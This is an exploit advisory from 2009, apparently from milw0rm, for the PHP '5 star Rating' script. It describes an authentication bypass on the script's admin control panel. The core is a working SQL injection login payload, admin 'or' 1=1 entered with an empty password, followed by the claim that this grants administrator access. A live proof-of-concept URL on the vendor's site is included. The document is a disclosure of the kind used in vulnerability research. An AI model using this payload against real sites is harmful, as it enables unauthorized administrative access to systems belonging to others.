5 star Rating 1.2 - Authentication Bypass

EDB-ID:

8515

CVE:



Author:

zer0day

Type:

webapps


Platform:

PHP

Date:

2009-04-22


@@@@@@@@  @@@@@@@@  @@@@@@@    @@@@@@@@   @@@@@@@    @@@@@@   @@@ @@@  
@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@ @@@  
     @@!  @@!       @@!  @@@  @@!   @@@@  @@!  @@@  @@!  @@@  @@! !@@  
    !@!   !@!       !@!  @!@  !@!  @!@!@  !@!  @!@  !@!  @!@  !@! @!!  
   @!!    @!!!:!    @!@!!@!   @!@ @! !@!  @!@  !@!  @!@!@!@!   !@!@!   
  !!!     !!!!!:    !!@!@!    !@!!!  !!!  !@!  !!!  !!!@!!!!    @!!!   
 !!:      !!:       !!: :!!   !!:!   !!!  !!:  !!!  !!:  !!!    !!:    
:!:       :!:       :!:  !:!  :!:    !:!  :!:  !:!  :!:  !:!    :!:    
 :: ::::   :: ::::  ::   :::  ::::::: ::   :::: ::  ::   :::     ::    
: :: : :  : :: ::    :   : :   : : :  :   :: :  :    :   : :     :     
                                                                       

--[ Informations ]------------------------------------------------------

@author : zer0day (zer0day@vodkaorange.com)
@home : gotr00t.blogspot.com
@software : 5star_rating
@version : 1.0
@web site : http://www.maniacomputer.com/5star_rating/New_5Star.html

--[ Exploit ]-----------------------------------------------------------

---{{Authentification ByPass}}
Go to :
http://[TARGET]/5star_rating/admin/control_panel_sample.php
In username just enter : admin 'or' 1=1
and empty password

You are logged in Administrator !

Simply ?

--[ Proof Of Concept ]--------------------------------------------------

http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php

--[ End Of File ]-------------------------------------------------------

# milw0rm.com [2009-04-22]